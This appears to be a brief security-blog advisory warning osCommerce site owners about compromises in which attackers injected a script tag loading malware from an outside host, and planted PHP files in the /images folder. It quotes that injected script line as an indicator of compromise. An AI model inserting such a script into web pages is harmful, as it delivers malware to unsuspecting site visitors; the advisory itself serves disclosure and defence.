If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:
< script src = “http://nt02.co.in/3″ >
This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.
We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.
If you have more information let us know.
About David Dede
Pingback: osCommerce - Alta Vulnerabilità ad attacchi Malware
Pingback: Utilizadores do osCommerce deverão corrigir a sua instalação | WebSegura.Net
Pingback: osCommerce attacks – kirm-sky.ru | Sucuri
Pingback: Pericolo malware per i siti che utilizzano osCommerce | Edit - Il blog di HTML.it